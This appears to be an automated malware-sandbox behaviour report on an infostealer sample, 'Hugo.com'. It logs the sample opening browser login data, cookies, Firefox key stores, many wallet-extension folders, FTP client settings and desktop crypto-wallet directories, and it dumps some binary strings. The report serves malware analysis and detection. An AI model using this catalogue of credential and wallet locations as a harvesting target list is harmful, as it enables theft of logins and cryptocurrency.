Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Hugo.com	Binary or memory string: WIN_81
Source: Hugo.com	Binary or memory string: WIN_XP
Source: Hugo.com.2.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Hugo.com	Binary or memory string: WIN_XPe
Source: Hugo.com	Binary or memory string: WIN_VISTA
Source: Hugo.com	Binary or memory string: WIN_7
Source: Hugo.com	Binary or memory string: WIN_8

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
